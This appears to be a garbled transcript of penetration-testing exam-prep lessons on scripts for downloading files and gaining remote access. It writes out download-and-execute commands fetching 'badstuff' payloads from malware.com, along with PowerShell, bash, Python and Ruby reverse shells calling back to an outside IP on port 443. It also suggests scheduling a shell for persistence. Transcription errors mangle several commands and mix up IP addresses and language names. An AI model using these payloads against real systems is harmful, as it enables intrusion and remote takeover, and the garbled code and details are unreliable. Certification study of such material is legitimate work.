220. Exploits and Automation (OBJ 5.2)
In this section of the course, we’re going to discuss some different exploits and automations that you can perform using scripting and programming language code during your engagements. Now, as we move throughout this section, we’re going to continue looking at the Fifth Domain for our exam, which is tools and code analysis. Now, this section of the course will be focused on completing our coverage of Objective 5.2, which states that “Given a scenario, you must analyze a script or code sample for use in a penetration test.” At this point, you should understand the basics of scripting, and you should be able to work your way through reading a sample script that’s written in bash, PowerShell, Python, Pearl, JavaScript or Ruby. So in this section, we’re going to look at a few more examples of scripts and code that may be used with different types of exploits and tasks that you’re going to do during your engagement. First, we’re going to be looking at some exploits that can be used to download files.
Then we’re going to look at some exploits that we can use for conducting remote access to a given system. After that, we’re going to look at exploits for enumeration of view users, and assets that you can use during your engagements. Then we’re going to shift our focus from specific code examples, and instead start looking at different tasks that you’re going to be able to automate during your penetration tasks. This includes things like the automation of port scans, scripting IP addresses, and using scripts to automate different functions, and tasks using Nmap. There are so many different ways for you to leverage automation in order to make your job easier as a penetration tester during an engagement. So let’s jump back into our coverage of Domain 5, Tools and Code Analysis with exploits and automation in this section of the course.
221. Exploits to Download Files (OBJ 5.2)
In this lesson, we’re going to talk about some exploits you can use to download files. Now we’re not going to cover all six languages in this lesson. Instead, I just want to bring up a couple of different scripts to show you how easy it is to download files using these different types of exploits. This will allow you to download malware onto a machine, and then you can run that malware to infect that machine to be able to install secondary tools that you may need once you get your initial access. The first one I have is for PowerShell and this will allow you to download and run a script.
https://malware.com/badstuff.ps1′” Normally when this command is issued, it is all going to be on one line as you see on the bottom of the screen. But, to make it big enough for you to be able to read it I’ve blown it up and separated it across three lines. Now, in the case of this script, what are we doing? Well, we’re using PowerShell to run or dash C the command IEX New-Object System.Net.WebClient which opens up a web client and then does something. In this case we want to download the results of that string. That string is a web address that is hosting a ps1 file which is a PowerShell file. Now this is pretty obvious because I called it malware.com but you could just as easily have this at some other website that you control that looks much more innocuous, and it may be something like Jason’scoolscripts.com or something like that. The next one we have is when you want to download a file and you don’t want to run it immediately. For example, maybe you need to upload some tools and and stage all these things. So you’re ready to run an exploit later. That’s what you can do with this particular command. So, to use this again, it would all be on one line as you see on the bottom of the screen, but I’ve blown it up here to make it a little bit easier to see. Powershell.exe -c “(New-ObjectSystem.Net.WebClient). DownloadFile”https://malware.com/badstuff.zip”, “C:/Windows/Temp/downloaded.zip”” So what are we doing? We’re reaching out to the server at malware.com and downloading badstuff.zip, and we’re saving it on the local windows machine that we’ve exploited inside of its temp directory. And we’re calling it downloaded.zip. At that point, we now have that file on the system and we can start working through it using our access to install the tools that are located inside of that file. The third one I want to show you is for Python. If you want to download a file on Python there’s a little bit more to it.
It takes four lines of code. The first one is import requests. Which is basically importing a library that will allow you to do these type of connections. The second one is url = and the url you want to use. I’m just setting a variable here. Then I have r = requests.get(url,allow_redirects=True) an then open(‘downloaded.zip’,’wb’).write(r.content) So what are we doing? We’re importing a library. We’re setting a variable for the URL we want to download stuff from, and then we’re going to to make a request to that URL. And if there’s a redirection in place we will follow that redirection, until we get to the file we want, which is badstuff.zip. And then we are going to open that file and we’re going to end up saving it to the r.content. And then we’re going to open a file locally called downloaded.zip, and write all of the contents that we get from r which was the request to that remote URL.
All right, for the exam. What do you need to understand from this lesson? Well, the key thing is that you can use small little scripts to do all sorts of crazy damage. Now on the exam, we’re not expecting you to come up with any of these scripts off the top of your head. But, you see one of these as an example in a question, you should be able to identify its function. If you see one of these where we’re trying to grab a file, that is most likely going to be that you’re trying to download a file to the system. And that is what you’re going to answer on the exam. This is not an enumeration script. This is not a way for us to be able to do password cracking. No, this is downloading a file so we can stage further exploits. And that’s about the level of depth you need to know to be able to answer questions on the exam about this topic.
222. Exploits for Remote Access (OBJ 5.2)
In this lesson, we’re going to look at some exploits for remote access in many different programming languages. First, we have PowerShell. If I want to create a remote access payload in PowerShell, I’m going to use a tool called MSF venom. Now MSF venom is part of the Metasploit framework. This tool will allow you to create payloads for different platforms with different operating systems or different chip sets. For example, you can create some for windows, Linux, Android, and others.
If I want to be able to go after a windows machine using a PowerShell script, I can use this command right here on my Kali Linux machine. MSF venom dash P command slash windows slash reverse PowerShell Lhost equals the IP address of my listening host, L port equals the port that I’m going to be listening on such as 443 and then the greater than sign script dot PS one. So what I’m doing is outputting or redirecting the results of this MSF venom command into a script called script.ps one. Once I have that, I’m going to go ahead and put that on a web server someplace and then using a download exploit to allow the victim to download and run that script.
Then now gives me a full payload for reverse PowerShell inside of it. Now, the only real problem with using something like this, is that resulting script tends to be pretty large. It’s going to be a couple of hundred lines worth of code. And so it may trigger some alert on the system you’re trying to victimize. If you want to do something that’s just native to PowerShell using reverse script and live off the land, You can do that as well. Here, we have a couple of lines script that you could see is going across six lines on my screen.
In reality, this is actually only one line of code but I couldn’t fit it on my screen that way which is why I have it spread across six lines. As you look through it, you’ll see there are a lot of semicolons. So what I’m going to do is make it a little bit easier for us to see and break it apart so that each line is on its own line and we can blow up the text that way and see it a little bit better. Let’s go ahead and look through the script. First, we have a variable client equals new object system.net dot sockets dot TCP client. And then there’s an IP address and a port number.
You can probably guess that is going to be the listener set up for my client. What I want that victim machine to call out to, then we have a variable stream and that’s being set to client dot get stream. Next we have bite, dollar sign bite equals zero.dot 65535% zero. Next we have while I equal stream.read parentheses bite comma zero bites length does not equal zero. We’re going to do some actions. What are those actions? Well, it’s the next four or five lines here. So we’re going to have data equals new object dash type name, system dot, text dot asking and coding dot get string privacy bites 0 dot side. I then send back equals IE data a redirection for the output string and then send back to equals send back plus PS plus pwd.plus a redirect send by equals texting coding ask E get bytes, send back two and then stream dot right send by comma zero, comma send byte length, and then stream flush. And then client close. So what is this doing? Well again, this is going to be a reverse shell.
Python is going to establish a connection using TCP to our listener. In this case, 66.67.88 dot 99 over port 443. Then it’s going to start sending data back and forth and anything it gets from the command prompt from standard input or standard output. It’s going to be redirected over this connection. Anything coming in this connection will be redirected back into PowerShell so it can run those commands. And we’re going to continue to do that over and over again until we no longer have any data to send. And that connection will then be flushed and closed out. This is a really simple way to do a reverse shell inside a PowerShell. If you think this is easy, wait till see bash. With bash we could create a reverse shell in just one line.
In bash, you can just do bash dash I greater than ampersand slash Deb slash TCP slash 66.77.88.99 slash 443, 0 greater than ampersand one. This is setting up an interactive bash shell. That’s where bash dash I is on this Linux system. And then we’re going to redirect both the standard output and the standard error using that greater than ampersand to the device that’s using port 443 over TCP to connect with 66.77.88 dot 99. Now, we eat to the second half of this command where you have zero greater than ampersand one. What is that doing? Well, it’s redirecting the connection to the standard input going back into this terminal as well.
So we now have full two-way communication with this particular system. With this one line, you could put this into like Chromecast and that way every morning at a certain in time it will make a call out to your system. Listening on port 443 at this IP address it is a great one liner that you can use for any Linux server. Next, we have a Python Linux Reverse Shell. Maybe you don’t want to use bash. Maybe you want to do it in Python. And if you do this couple of line script we’ll be great to do that for you. First, we’re going to create a couple of variables and do the export command to make them global variables.
So our host equals the IP. Our port equals the port, then Python-C import socket comma OS comma PTY, We’re importing three libraries, socket for network connections, OS to talk to the operating system and PTY to be able to do terminal emulation. Then we have S equal socket dot socket parenthesis, parenthesis, and then we do S dot connect OS get environment our host, integer of OS dot get environment, our port. So what we’re doing in this line is we are opening up a sock connection to the, our host and the airport that we specified in those global variables.
Then we have OS dot dup two, S file no, FD for FD in 0 1, 2, and then PTY spawn parenthesis slash bin slash SH. So what are we doing? We’re a connection and once we do that, we’re going to spawn a bin slash SH shell which gives us a bash shell. And we’re going to allow that to be a reverse shell back to the, our host that we just specified. And just to note, this should all be written as one line when sending it in through the bash terminal. And so it would look more like this than what I just did but the reason I did the other the way is to make it easier for us to read as we go through it. The next one we’re going to look at is Ruby and Ruby is even easier than Python when it comes to creating Linux Reverse Shell. With Ruby, t’s a single line of code and you can see it here stretched over two lines on my screen, but it would be entered as a single line. This says Ruby dash R socket dash E Post F equals TCP socket.open parenthesis IP, port parenthesis dot two, I semicolon EXEC sprint F parenthesis bin slash SH dash I less than ampersand percent D greater than ampersand percent D two greater than ampersand percent D, F,F,F and parentheses.
What is this doing? Well, this is spawning a bin slash bash cell using the system command that we used earlier from bash and we’re redirecting our standard input and output as well as our standard error to, and from this connection that we’re creating using this TCP socket, going to our remote listener over port 443. Same thing we used earlier with bash but now we can do it through Ruby. And depending on what languages you have access to, you can do this using a variety of different tools. The final one I want to bring up is to be able to use Ruby, to do a Windows Reverse Shell. It looks a lot like the one we just did with Linux but it is slightly different. Notice the first light is almost identical. In this case, it is Ruby dash R socket dash E quote C equals TCP socket.new parenthesis IP, port, and parenthesis while command equals C dot gets IO dot P open parenthesis CMD, R and parenthesis squiggly bracket IO C print IO read, and squiggly bracket and.
So what is this doing? It’s basically doing the exact same thing as the Linux Reverse Shell. The only difference is instead of launching the bash shell, we’re going to be launching the command prompt because we’re attacking a window system. All right, for the exam. When it comes to looking for exploits for remote access, what are some keys you should be looking for? Well, start looking for anything that says TCP, UDP, socket.
Anything that really has to do with networking is probably going to be some sort of a remote access tool because you’re trying to establish a connection or create a two-way connection between you and the victimized system. When you’re looking at code on the exam, keep those things in mind. It’ll help you identify that the purpose of that code is for remote access. Another giveaway that has to do with remote access is if you see anything like slash bin slash SH or something like command dot EXE or PS dot EXE or PowerShell dot EXE because you’re trying to launch a shell on that system. That means you’re trying to gain two way remote access to take control of that system using that shell.